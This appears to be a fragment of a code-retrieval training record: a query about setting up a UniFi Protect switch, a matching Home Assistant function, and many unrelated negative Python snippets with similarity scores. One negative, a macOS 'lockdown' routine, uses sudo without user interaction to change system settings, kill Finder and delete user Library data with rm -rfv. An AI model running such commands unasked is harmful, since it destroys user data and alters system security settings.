delayed[tuple(slc)]\n\n elif dn < 0:\n # pre-delay\n slc = [slice(None)] * len(x.shape)\n slc[axis] = slice(-dn, n)\n delayed = x[tuple(slc)]\n\n if keep_length:\n zeros_shape = list(x.shape)\n zeros_shape[axis] = -dn\n zeros = np.zeros(zeros_shape)\n delayed = np.concatenate((delayed, zeros), axis=axis)\n else:\n # no delay\n delayed = x\n\n return delayed", "def send_packet(self, pk):\n try:\n self.out_queue.put(pk, True, 2)\n except queue.Full:\n if self.link_error_callback:\n self.link_error_callback('RadioDriver: Could not send packet'\n ' to copter')", "def main(s0, s1, s2, s3, delayFunc, dm, decimate = 0):\n\n\t# Ignore, testing\n\n\n\t# Get the delays (in seconds)\n\tprint(\"Finding time delays...\")\n\tdelays = delayFunc(absftop, -100. / 512, nchans, dm)\n\tprint(\"Delays (s):\")\n\tprint(delays)\n\tdelays /= sampleRate\n\tdelays = delays.astype(int)\n\n\t# Build up a \n\toutputLen = int(s0.shape[0] - np.max(delays))\n\tdataOut = np.ones((outputLen, nchans), dtype = np.int32)\n\tprint(delays)\n\n\t# Terribl approach to RFI\n\tzapchans = list(range(150,200)) + list(range(280, 290)) + list(range(305, 320)) + list(range(450, nchans))\n\n\t# SImple implementation that works, but isn't cache efficient\n\tprint(\"Forming Stokes I + Dedispersing... processing channel:\")\n\tfor i in range(nchans):\n\t\tif i in zapchans:\n\t\t\tcontinue\n\t\tprint(f\"{i} ({100 * i / min(430,nchans)} %)\", end = '\\r')\n\t\tdataOut[..., i] += np.square(s0[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[..., i] += np.square(s1[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[..., i] += np.square(s2[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[..., i] += np.square(s3[delays[i]: delays[i] + outputLen, i].astype(np.int32))\n\n\t# Cache efficient but untested\n\t\"\"\"\n\tprint(\"Forming Stokes I + Dedispersing... processing sample:\")\n\tblockCount = 128\n\tblockSize = int(dataOut.shape[0] / blockCount)\n\tfor i in range(blockCount):\n\t\tif i in zapchans:\n\t\t\tcontinue\n\t\tprint(f\"{i* blockSize} -> {(i + 1) * blockSize} ({100 * i / blockCount:07.3f} %)\", end = '\\r')\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s0[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s1[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s2[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] + outputLen, i].astype(np.int32))\n\t\tdataOut[i * blockSize: (i+1) * blockSize, :] += np.square(s3[i * blockLength + delays[i]: (i + 1) * blockLength + delays[i] + outputLen, i].astype(np.int32))\n\t\"\"\"\n\n\tif decimate:\n\t\tprint(\"Decimating...\")\n\t\trollingSum = np.cumsum(dataOut, axis = 0)\n\t\tdataOut = rollingSum[decimate::decimate, :] - rollingSum[:-decimate:decimate, :]\n\n\n\tprint(\"Plotting...\")\n\tplt.figure(figsize = (24,12))\n\tplt.imshow(dataOut.T, aspect = 'auto', vmax = np.percentile(dataOut, 95), vmin = np.percentile(dataOut, 33))\n\tplt.savefig(f'./debugfull_{datetime.datetime.now().isoformat()}.png')\n\n\tplt.figure(figsize = (24,12))\n\tplt.imshow(np.log10(dataOut.T), aspect = 'auto', vmax = np.log10(np.percentile(dataOut, 95)), vmin = np.log10(np.percentile(dataOut, 33)))\n\tplt.savefig(f'./debugfull2_{datetime.datetime.now().isoformat()}.png')\n\t\n\tplt.figure(figsize = (24,12))\n\td1 = dataOut[:, :100].sum(axis = 1)\n\td1 -= np.mean(d1, dtype = np.int64)\n\td2 = dataOut[:, 100:200].sum(axis = 1)\n\td2 -= np.mean(d2, dtype = np.int64)\n\td3 = dataOut[:, 200:300].sum(axis = 1)\n\td3 -= np.mean(d3, dtype = np.int64)\n\td4 = dataOut[:, 300:].sum(axis = 1)\n\td4 -= np.mean(d4, dtype = np.int64)\n\tplt.plot(d1, alpha = 0.3, label = '1')\n\tplt.plot(d2, alpha = 0.3, label = '2')\n\tplt.plot(d3, alpha = 0.3, label = '3')\n\tplt.plot(d4, alpha = 0.3, label = '4')\n\tplt.legend()\n\tplt.savefig(f'./debug_{datetime.datetime.now().isoformat()}.png')\n\n\tprint(\"Done!\")", "def sample_delay(self, which):\n return _spacegrant_swig.binary_sink_sptr_sample_delay(self, which)", "def IRC_send_called_every_three_seconds(self):\n\n if (self.ircMessageBuffer):\n try:\n # print(\"Buffered\")\n stringToSend = str(self.ircMessageBuffer.popleft())\n print(\"string to send : \" + stringToSend)\n if self.ircSocket:\n self.ircSocket.send((stringToSend).encode('utf8'))\n except Exception as e:\n logging.error(\"IRC send error:\")\n logging.error(\"In IRCSendCalledEveryThreeSeconds\")\n logging.error(str(e))\n logging.exception(\"Exception : \")", "def send_event(self, dsts):\n\n # get a list of the port numbers to send a message to\n if dsts: \n dsts_copy = dsts\n dsts = [socket_connections[clock_id] for clock_id in dsts] \n\n self.send_event_helper(dsts)\n\n # keep track of the logical clock time when the message was sent\n # so that it can be put in the log\n cur_time = self.clock_time\n\n # update the logical clock time\n self.clock_time += 1\n\n # log sending the message\n self.log(\" Sending to \" + str(dsts_copy) + \" at LC time: \" + str(cur_time))", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.hdlc_framer_sptr_declare_sample_delay(self, *args)", "def run(self):\n\n # self.peripheral.connect(self.address)\n\n # //-set the delegate to handle notification message process\n # self.peripheral.setDelegate(MyDelegate(self.sinOut))\n if self._type == \"BW\":\n uuid = \"0000fff0-0000-1000-8000-00805f9b34fb\" # the bought module distinguished by the name.\n # BW means the bought module's name \"BW-ECG-01\".\n svc = self.peripheral.getServiceByUUID(uuid)\n\n # //-the characteristic that data can be written to\n chr_of_writable = svc.getCharacteristics()[0]\n # //-the characteristic that receives notification from other peripheral.\n chr_of_notify = svc.getCharacteristics()[1]\n # //-enable the notify\n self.peripheral.writeCharacteristic(chr_of_notify.valHandle + 1, struct.pack('<bb', 0x01, 0x00), True)\n # //-bind user ID to BW-ECG-01, the ID could be a random ID.\n chr_of_writable.write(b'\\xE8\\x41\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00',\n True)\n # //-start the acquiring, a time(Y/M/D/H/H/S/deltaT) should be given. the time could be a random time\n # //-but the delta T should have meaning which is the acquiring time. 0x01 means 1 minutes.\n # //-the delta T could be modified as other number, this could be done by UI.\n # //-if the number could be set by user, that will be perfection.\n chr_of_writable.write(b'\\xE8\\x23\\x15\\x03\\x0b\\x10\\x15\\x00\\x00\\x01', True)\n # //-start continually acquiring\n chr_of_writable.write(b'\\xE8\\20', True)\n\n while self.working:\n if self.peripheral.waitForNotifications(1.0):\n # print(\"notification:\")\n continue\n else:\n uuid = \"f000fff0-0451-4000-b000-000000000000\" # the module made by ourselves\n svc = self.peripheral.getServiceByUUID(uuid)\n ch = svc.getCharacteristics()[0]\n self.peripheral.writeCharacteristic(ch.valHandle + 1, struct.pack('<bb', 0x01, 0x00))\n # print(\"waiting...\")\n # self.sinOut.emit(\"waiting...\")\n\n while self.working:\n if self.peripheral.waitForNotifications(1.0):\n # print(\"notification:\")\n continue", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.invert_bit_sptr_declare_sample_delay(self, *args)", "def delay():\r\n time.sleep(2)", "def deepsleep(time_ms: int = None) -> None:", "def send(cls,event):\n for rcv in list(cls.getReceivers(event.sender)):\n if event.consumed:\n break\n rcv(event)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.hdlc_deframer_sptr_declare_sample_delay(self, *args)", "def wake_up(self):\n self._write.send(b'1')", "def sleep(self,secs):\r\n d = Deferred()\r\n self.reactor.callLater(secs,d.callback,'Sleeping')\r\n return d", "def sleep(self,secs):\r\n d = Deferred()\r\n self.reactor.callLater(secs,d.callback,'Sleeping')\r\n return d", "def discover(self, seconds=3):\n log.info(\"Discovering devices\")\n self.upnp.broadcast(seconds)", "def declare_sample_delay(self, *args) -> \"void\":\n return _beamforming_swig.doaesprit_sptr_declare_sample_delay(self, *args)", "def _delayandsum4(data, offsets, ifactor2, steeramp, out, autopower):\n gridsize, numchannels = offsets.shape\n num = out.shape[0]\n for n in nb.prange(num):\n for gi in nb.prange(gridsize):\n out[n,gi] = 0\n autopower[n,gi] = 0\n for mi in range(numchannels):\n ind = offsets[gi,mi]\n r = (data[ind+n,mi] * (1-ifactor2[gi,mi]) \\\n + data[ind+n+1,mi] * ifactor2[gi,mi]) * steeramp[gi,mi]\n out[n,gi] += r\n autopower[n,gi] += r*r", "def delayed_generic_s21(params, f):\n return cable_delay(params, f) * generic_s21(params, f)", "def sleep_after(self, seconds):\n if self._firmware >= 264:\n self.write(self.ASCII_ESC, '8', seconds, seconds >> 8)\n else:\n self.write(self.ASCII_ESC, '8', seconds)", "def broadcast(self, txt):\n for chan in self.state['joinedchannels']:\n self.say(chan, txt)", "def send_outgoing_c2d_messages_thread(self):\n logger.info(\"Starting thread\")\n\n while not (self.done.isSet() and self.outgoing_c2d_queue.empty()):\n reset_watchdog()\n\n try:\n outgoing_c2d = self.outgoing_c2d_queue.get(timeout=1)\n except queue.Empty:\n pass\n else:\n device_id = outgoing_c2d.device_id\n message = outgoing_c2d.message\n props = outgoing_c2d.props\n device_data = self.device_list.try_get(device_id)\n run_id = device_data.run_id if device_data else None\n\n start = time.time()\n try:\n self.registry_manager.send_c2d_message(device_id, message, props)\n except Exception as e:\n logger.error(\n \"send_c2d_message to {} raised {}. Dropping. \".format(\n device_id, str(e) or type(e)\n ),\n exc_info=e,\n extra=custom_props(device_id, run_id),\n )\n else:\n end = time.time()\n if end - start > 2:\n logger.warning(\n \"Send throttled. Time delta={} seconds\".format(end - start),\n extra=custom_props(device_id, run_id),\n )", "def transmission_scheduler(self, ap_index:int):\n # sched_load = False\n # next_transmission_time = 0\n # current_sq = self.rec_reg.read()[ap_index]\n \n # for i in range(len(self.sch.queue)):\n # if self.sch.queue[i][1] == 4:\n # sched_load = True\n # next_transmission_time = self.sch.queue[i][0]\n # break\n \n # sched_args = list()\n # time_deadlines = list()\n \n # if sched_load:\n # time_sum = next_transmission_time + self.transmit_freq/2 \n # else:\n # time_sum = time.time()\n \n # #prebuild a list of transmission events and times for efficient entry into the scheduler\n # while True:\n # # delay added at start to avoid race between transmit() trying to read from the queue \n # # and the scheduler filling the queue\n # time_sum += self.transmit_freq\n # try:\n # # session queue of type bitarray\n # sched_args.append(current_sq.next())\n # # delete session queue object when the full queue is added to the scheduler\n # except ValueError:\n # # disconnect signal for transmit\n # time_deadlines.append(time_sum)\n # sched_args.append(None)\n # break\n # time_deadlines.append(time_sum)\n \n # #enter transmission events into the scheduler\n # for i in enumerate(time_deadlines):\n # self.sch.enterabs(time_deadlines[i], 4, self.transmit, \n # argument=(ap_index,sched_args[i]), kwargs={})\n # #print_queue(self.s.queue)\n # self.log.info(\"Scheduled transmission events for AP: %s\", ap_index)\n # self.log.info(\"Estimated transmission duration (s): %s\", \n # self.sch.queue[len(self.sch.queue)-1][0]-self.sch.queue[0][0])", "async def module_delay_event(self, delay: Union[int, float], event: str, ctx: Context, *args, **kwargs):\n self.logger.debug(f\"Delaying event {event} for {delay} seconds\")\n await asyncio.sleep(delay)\n await self.module_send_event(event, ctx, *args, **kwargs)", "def _send(self, frame):\n \n self.device.write(frame)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.message_debug_sptr_declare_sample_delay(self, *args)", "def broadcast(msg):\r\n for user in clients:\r\n msg_client(msg, user)" ]
[ "0.5880643", "0.56571025", "0.55984133", "0.5559285", "0.5533061", "0.54948366", "0.54706526", "0.5467734", "0.5466112", "0.54435146", "0.5429417", "0.5395709", "0.53661245", "0.5351861", "0.5349273", "0.53445977", "0.5340805", "0.533384", "0.5331035", "0.5317365", "0.5315561", "0.5306017", "0.53040284", "0.5283815", "0.52828276", "0.5275872", "0.5268948", "0.52627057", "0.52599937", "0.525916", "0.5256987", "0.5253164", "0.52453303", "0.5240753", "0.52359444", "0.5230384", "0.52265245", "0.521548", "0.5196707", "0.51887083", "0.5184638", "0.5184442", "0.5176369", "0.51755476", "0.5173855", "0.51737994", "0.51594937", "0.51561874", "0.5150906", "0.51457036", "0.51432675", "0.51386535", "0.5138301", "0.5131315", "0.513116", "0.5128994", "0.5124785", "0.5122888", "0.51118773", "0.51067793", "0.50968504", "0.50913244", "0.5087137", "0.5075151", "0.5074254", "0.50732374", "0.5070124", "0.50686556", "0.50611013", "0.5054597", "0.5052765", "0.5050357", "0.5050011", "0.5047517", "0.5043926", "0.5041538", "0.50390154", "0.5029922", "0.50297916", "0.5028933", "0.5020091", "0.50168985", "0.49972898", "0.49918672", "0.49846566", "0.49840346", "0.4983819", "0.4981708", "0.4981708", "0.4979034", "0.49731869", "0.49685946", "0.49639985", "0.49502608", "0.4948472", "0.49421236", "0.49389425", "0.4938251", "0.49342766", "0.4930372", "0.492468" ]
0.0
-1
Set up an Unifi Protect Switch.
async def async_setup_platform(hass, config, async_add_entities, _discovery_info=None): upv = hass.data[UPV_DATA]["upv"] coordinator = hass.data[UPV_DATA]["coordinator"] if not coordinator.data: return ir_on = config.get(CONF_IR_ON) if ir_on == "always_on": ir_on = "on" ir_off = config.get(CONF_IR_OFF) if ir_off == "led_off": ir_off = "autoFilterOnly" elif ir_off == "always_off": ir_off = "off" switches = [] for switch_type in config.get(CONF_MONITORED_CONDITIONS): for camera in coordinator.data: switches.append( UnifiProtectSwitch(coordinator, upv, camera, switch_type, ir_on, ir_off) ) async_add_entities(switches, True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, coordinator, upv, camera, switch_type, ir_on, ir_off):\n self.coordinator = coordinator\n self.upv = upv\n self._camera_id = camera\n self._camera = self.coordinator.data[camera]\n self._name = \"{0} {1} {2}\".format(\n DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"]\n )\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n self._switch_type = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)\n _LOGGER.debug(\n \"UnifiProtectSwitch: IR_ON %s IR_OFF %s\", self._ir_on_cmd, self._ir_off_cmd\n )", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n server_info = entry_data[\"server_info\"]\n\n if not protect_data.data:\n return\n\n ir_on = entry.data[CONF_IR_ON]\n if ir_on == \"always_on\":\n ir_on = \"on\"\n\n ir_off = entry.data[CONF_IR_OFF]\n if ir_off == \"led_off\":\n ir_off = \"autoFilterOnly\"\n elif ir_off == \"always_off\":\n ir_off = \"off\"\n\n switches = []\n for switch, switch_type in SWITCH_TYPES.items():\n required_field = switch_type[_SWITCH_REQUIRES]\n for camera_id in protect_data.data:\n # Only Add Switches if Camera supports it.\n if required_field and not protect_data.data[camera_id].get(required_field):\n continue\n\n switches.append(\n UnifiProtectSwitch(\n upv_object,\n protect_data,\n server_info,\n camera_id,\n switch,\n ir_on,\n ir_off,\n )\n )\n _LOGGER.debug(\"UNIFIPROTECT SWITCH CREATED: %s\", switch)\n\n async_add_entities(switches)", "def __init__(self, data, camera, switch_type):\n self.data = data\n self._camera_id = camera\n self._camera = self.data.devices[camera]\n self._name = \"{0} {1} {2}\".format(DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"])\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._state = STATE_OFF\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)", "def __init__(\n self, upv_object, protect_data, server_info, camera_id, switch, ir_on, ir_off\n ):\n super().__init__(upv_object, protect_data, server_info, camera_id, switch)\n self.upv = upv_object\n switch_type = SWITCH_TYPES[switch]\n self._name = f\"{switch_type[_SWITCH_NAME]} {self._camera_data['name']}\"\n self._icon = f\"mdi:{switch_type[_SWITCH_ICON]}\"\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._switch_type = switch_type[_SWITCH_TYPE]", "def setupHw():\n\n pin.setupHw()\n pin.setupOutPins(traffic_lights)\n pin.setDebug(False)", "def initialize_heating_pin(pi, pin):\n pi.set_pull_up_down(pin, pigpio.PUD_DOWN)", "def setup():\n print('Setup option is not working')\n quit()\n print('Long press the reset button until the blue Led is blinking quickly')\n print('Long press again until blinking slowly')\n print('Manually connect this device to the Wifi SSID named BlroadlinkProv')\n print('Press security mode (0 = none, 1 = WEP, 2 = WPA1, 3 = WPA2, 4 = WPA1/2)')\n print('Default:3')\n\n security = raw_input('Security mode:').lower()\n\n if security == 'none':\n security = 0\n elif security == 'wep':\n security = 1\n elif security == 'wpa1':\n security = 2\n elif (security == 'wpa2') or (security == ''):\n security = 3\n elif security == 'wpa1/2':\n security = 4\n security = int(security)\n if not(0 <= security <= 4):\n raise IndexError\n\n ssid = raw_input('SSID of your router :')\n if security != 0:\n password = raw_input('Password:')\n else:\n password = ''\n broadlink.setup(ssid, password, security)", "def setup(self):\n self.log.debug('RFSwitch - in RFSwitch setup()')\n # Add resource setup code here\n print(\"Calling RFSwitch:setup\")", "async def async_setup_platform(hass, config, async_add_entities, _discovery_info=None):\n data = hass.data[UPV_DATA]\n if not data:\n return\n\n switches = []\n for switch_type in config.get(CONF_MONITORED_CONDITIONS):\n for camera in data.devices:\n switches.append(UnifiProtectSwitch(data, camera, switch_type))\n\n async_add_entities(switches, True)", "def ipmi_setup():\n\n verify_ipmi_user_parm_accepted()", "def set_wep(self, pardus_profile):\n\n self.auth_alg = \"open\" #TODO: or 'shared' ??\n self.key_mgmt = \"None\" # Which stands for WEP based key management\n self.wep_key0 = str(pardus_profile.get_auth_password()) # Default index\n self.wep_key_type = \"1\" # Interpret WEP keys as hex or ascii keys", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "async def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n data: ProtectData = hass.data[DOMAIN][entry.entry_id]\n\n async def _add_new_device(device: ProtectAdoptableDeviceModel) -> None:\n entities = async_all_device_entities(\n data,\n ProtectSwitch,\n camera_descs=CAMERA_SWITCHES,\n light_descs=LIGHT_SWITCHES,\n sense_descs=SENSE_SWITCHES,\n lock_descs=DOORLOCK_SWITCHES,\n viewer_descs=VIEWER_SWITCHES,\n ufp_device=device,\n )\n entities += async_all_device_entities(\n data,\n ProtectPrivacyModeSwitch,\n camera_descs=[PRIVACY_MODE_SWITCH],\n ufp_device=device,\n )\n async_add_entities(entities)\n\n entry.async_on_unload(\n async_dispatcher_connect(hass, _ufpd(entry, DISPATCH_ADOPT), _add_new_device)\n )\n\n entities: list[ProtectDeviceEntity] = async_all_device_entities(\n data,\n ProtectSwitch,\n camera_descs=CAMERA_SWITCHES,\n light_descs=LIGHT_SWITCHES,\n sense_descs=SENSE_SWITCHES,\n lock_descs=DOORLOCK_SWITCHES,\n viewer_descs=VIEWER_SWITCHES,\n )\n entities += async_all_device_entities(\n data,\n ProtectPrivacyModeSwitch,\n camera_descs=[PRIVACY_MODE_SWITCH],\n )\n\n if (\n data.api.bootstrap.nvr.can_write(data.api.bootstrap.auth_user)\n and data.api.bootstrap.nvr.is_insights_enabled is not None\n ):\n for switch in NVR_SWITCHES:\n entities.append(\n ProtectNVRSwitch(\n data, device=data.api.bootstrap.nvr, description=switch\n )\n )\n async_add_entities(entities)", "def _setup(self):\n if self._setup:\n return\n\n GPIO.setmode(GPIO.BCM)\n for i in (self.on, self.off):\n GPIO.setup(i, GPIO.OUT)\n self.stop_all()\n Outlet._setup = True", "def __init__(self):\n\n GPIO.setup(PIN_BTN, GPIO.IN, GPIO.PUD_UP)\n GPIO.setup(PIN_RED_LED_0, GPIO.OUT, GPIO.LOW)\n GPIO.setup(PIN_BLUE_LED, GPIO.OUT, GPIO.LOW)", "def __init__(self, user, server, port=80, model='motorized'):\n import pigpio\n self.user = user\n self.server, self.port = server, port\n self.model = model\n self.serial = self.get_serial()\n self.lock_id = self.get_lock_id()\n self.pi = pigpio.pi()\n self.avail_actions = {\n 'unlock': 600,\n 'lock': 2400,\n }", "def setProtectSurfaces():\n dislin.shlsur()", "def init(self):\n self.connect_to_switches()\n self.reset_states()", "def setup(self):\n self.pi.set_pull_up_down(self.gpio, pigpio.PUD_OFF)\n self.pi.set_watchdog(self.gpio, 0)\n self.register_callbacks()", "def lockdown_procedure():\n\tprint(\"----------\")\n\tprint_section_header(\"LOCKDOWN\", Fore.BLUE)\n\tprint_confirmation(\"Set secure configuration without user interaction.\")\n\n\t# Get sudo priv\n\tsp.run(\"sudo -E -v\", shell=True, stdout=sp.PIPE)\n\n\t####\n\t# FIREWALL\n\t####\n\n\tsp.run(['sudo', 'launchctl', 'load', '/System/Library/LaunchDaemons/com.apple.alf.agent.plist'], stdout=sp.PIPE)\n\tsp.run(['sudo', 'launchctl', 'load', '/System/Library/LaunchAgents/com.apple.alf.useragent.plist'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setglobalstate', 'on'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setloggingmode', 'on'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setstealthmode', 'on'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsigned', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsignedapp', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo', 'pkill', '-HUP', 'socketfilterfw'], stdout=sp.PIPE)\n\n\t####\n\t# SYSTEM PROTECTION\n\t####\n\n\tsp.run('sudo spctl --master-enable', shell=True, stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsigned', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsignedapp', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.captive.control Active -bool false'], stdout=sp.PIPE)\n\n\t####\n\t# METADATA STORAGE\n\t####\n\n\tsp.run(['rm', '-rfv', '\"~/Library/LanguageModeling/*\"', '\"~/Library/Spelling/*\"', '\"~/Library/Suggestions/*\"'])\n\tsp.run(['rm', '-rfv', '\"~/Library/Application Support/Quick Look/*\"'], stdout=sp.PIPE)\n\tsp.run([':>~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2'], shell=True, stdout=sp.PIPE)\n\n\t####\n\t# USER SAFETY\n\t####\n\n\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPassword', '-int', '1'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPasswordDelay', '-int', '0'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'AppleShowAllExtensions', '-bool', 'true'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'NSDocumentSaveNewDocumentsToCloud', '-bool', 'false'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'com.apple.finder', 'AppleShowAllFiles', '-boolean', 'true'], shell=True, stdout=sp.PIPE)\n\tsp.run(['killAll', 'Finder'], stdout=sp.PIPE)\n\n\t####\n\t# RESTART\n\t####\n\n\tfinal_configuration()", "def __init__(self, name, device, sensor_type, nvrdata):\n self._name = name\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._device = device\n self._sensor_type = sensor_type\n self._nvrdata = nvrdata\n self._icon = \"mdi:{}\".format(SENSOR_TYPES.get(self._sensor_type)[2])\n self._state = device[\"recording_mode\"]\n self._camera_type = device[\"type\"]\n self._attr = SENSOR_TYPES.get(self._sensor_type)[3]\n _LOGGER.debug(\"UnifiProtectSensor: %s created\", self._name)", "def set_up_wireless_security(self, pardus_profile):\n\n if pardus_profile.get_auth() in [\"wep\", \"wepascii\"]:\n self.set_wep(pardus_profile)\n elif pardus_profile.get_auth() == \"wpa-psk\":\n self.set_wpa(pardus_profile)\n else:\n return", "def cryptsetup_open(config):\n\n (password, slot) = config.first_password()\n\n args = [\"luksOpen\", config.image_path(), config.device_name()]\n\n cryptsetup(args, password)", "def init_switches(inds):\n for i in inds:\n GPIO.setup(i, GPIO.OUT, initial=0)", "def turn_off(self):\n self._state = False\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":0 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'): \n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":0 }', 5)", "def setUp(self):\n #if UI object not found. the watcher method will be invoked\n d.watcher('AUTO_FC_WHEN_ANR').when(text='ANR').when(text='强行关闭') .press('enter')\n d.wakeup() #wakeup device ", "def __init__(self, parent, endpoint):\n Wemo_Endpoint.__init__(self, parent, endpoint)\n self.device_type = self._Parent._DeviceTypes.get('wemo_switch')\n self.FEATURES.update({\n FEATURE_BRIGHTNESS: False,\n FEATURE_PERCENT: False,\n FEATURE_NUMBER_OF_STEPS: False\n })", "def setLowPassU(new_low_pass_u):\n return RoboCaller().call(\"setLowPassU\", \"void\", new_low_pass_u * 1000)", "def _init_hardware(self):\n return", "def setup_fan():\n global dev_fan\n dev_fan = iot_fan.Fan(config.option('pin_name', 'Fan'))\n fan_init()", "def teleopInit(self):\n self.myRobot.setSafetyEnabled(True)", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n server_info = entry_data[\"server_info\"]\n if not protect_data.data:\n return\n\n sensors = []\n for camera_id in protect_data.data:\n camera_data = protect_data.data[camera_id]\n if camera_data[\"type\"] == DEVICE_TYPE_DOORBELL:\n sensors.append(\n UnifiProtectBinarySensor(\n upv_object,\n protect_data,\n server_info,\n camera_id,\n DEVICE_TYPE_DOORBELL,\n )\n )\n _LOGGER.debug(\n \"UNIFIPROTECT DOORBELL SENSOR CREATED: %s\",\n camera_data[\"name\"],\n )\n\n sensors.append(\n UnifiProtectBinarySensor(\n upv_object, protect_data, server_info, camera_id, DEVICE_TYPE_MOTION\n )\n )\n _LOGGER.debug(\"UNIFIPROTECT MOTION SENSOR CREATED: %s\", camera_data[\"name\"])\n\n async_add_entities(sensors)\n\n return True", "def setup(wlan_type, wlan_name, alias, password, log_level):\n if alias is None:\n alias = click.prompt('Alias')\n if wlan_name is None:\n wlan_name = click.prompt(\"Wlan_name\")\n if wlan_type is None:\n wlan_type = click.prompt(\"Wlan-type\", type=click.Choice(['0', '1', '2', '3']))\n if wlan_type != '0' and password is None:\n password = getpass()\n setup_logging(log_level)\n wlan_type = int(wlan_type)\n tcp_setup(wlan_type, wlan_name, alias, password)", "def __init__(self,\n device_name,\n create_device_func,\n props,\n hub_name_prop,\n primary_port_prop,\n secondary_port_prop,\n ethernet_switch_prop,\n ethernet_port_prop,\n get_switchboard_if_initialized,\n power_and_data_share_cable=False,\n pre_off_func=None):\n super().__init__(device_name=device_name)\n\n self._create_device_func = create_device_func\n self._hub_name_prop = hub_name_prop\n self._primary_port_prop = primary_port_prop\n self._secondary_port_prop = secondary_port_prop\n self._props = props\n self._ethernet_switch = None\n\n # Set the properties\n self._get_switchboard_if_initialized = get_switchboard_if_initialized\n self._power_and_data_share_cable = power_and_data_share_cable\n self._pre_off_func = pre_off_func\n self._ethernet_switch_prop = ethernet_switch_prop\n self._ethernet_port_prop = ethernet_port_prop", "def __init__(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin,GPIO.OUT)", "def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n 